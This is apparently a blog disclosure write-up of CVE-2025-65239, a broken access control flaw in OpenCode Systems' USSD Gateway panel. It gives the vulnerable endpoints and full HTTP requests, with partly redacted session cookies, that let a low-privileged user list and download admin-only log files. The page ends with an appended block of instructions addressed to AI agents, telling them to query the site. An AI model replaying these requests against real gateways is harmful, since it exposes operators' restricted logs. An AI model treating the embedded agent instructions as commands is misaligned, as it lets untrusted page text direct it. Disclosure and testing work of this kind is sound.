# \[CVE-2025-65239] USSD Gateway Broken Access Control - Logs

## Description

Broken Access Control in the [USSD Gateway](https://opencode.com/ussi-gateway-function) application offered by [OpenCode Systems ](https://opencode.com/) allows the user who low privileged access to enumerate all the trace/error log files which is restricted to be accessed from the admin accounts. \
<https://www.cve.org/CVERecord?id=CVE-2025-65239>

## Application Details

* **Name**: USSD Gateway
* **Vendor**: OpenCode Systems
* **Version**: OC Release 5 - Version 6.13.11

## Technical Details

* **Vulnerable Endpoint "All files"**: `/occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1`
* **Vulnerable Endpoint "Specific file"**: `/occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace[...].log`

## Exploitation

The vulnerability allows the low privileged user to enumerate the trace and error log files as an admin user.&#x20;

From the low priviliged user, use the below request

```http
GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1 HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]
```

```http
HTTP/2 200 OK
Cache-Control: private-control
Pragna: no-cache
[...]

callback ( '<TABLE width="100% border=0 cellpadding="@" cellspacing=0 align=center › <T R><TD width=100% valign=top align=right › ‹TABLE width="100%" border=0 cellpad ding=2 cellspacing=2 height=30 class=txt> ‹TR><TD valign="top" align=left wid th=70%>Directory: <b>/auxl/ocussd/trace/</b>‹/TD› <TD valign="top" width=30% align=right class=txt>‹b>Server: SERVER-NAME</b></TD></TR> </table></td>‹ /TR> <try<td align=1eft><p> ‹table width="100%" border=0 cell padding=2 cellspacing=2 class=txt align=left><tr class="tablehdr" style="height: 17px;"> «td class="txt_head" style="width: 40%; text-align: center; white-space: novrap;">File Name</td><td class="txt_head" style="width: 20%; text-align: center; white-space: nowrap; "Date</td>td_class="txt head" stvle="width: 10%: text-alion: center: white-snace: [...]

[...]
```

Additionally, you can choose a specific file using the below request

```http
GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace[...].log HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]
```

<figure><img src="/files/2ybZqCnQtjA70ppWDEUX" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://eslam3kl.gitbook.io/blog/web-application-findings/cve-2025-65239-ussd-gateway-broken-access-control-logs.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.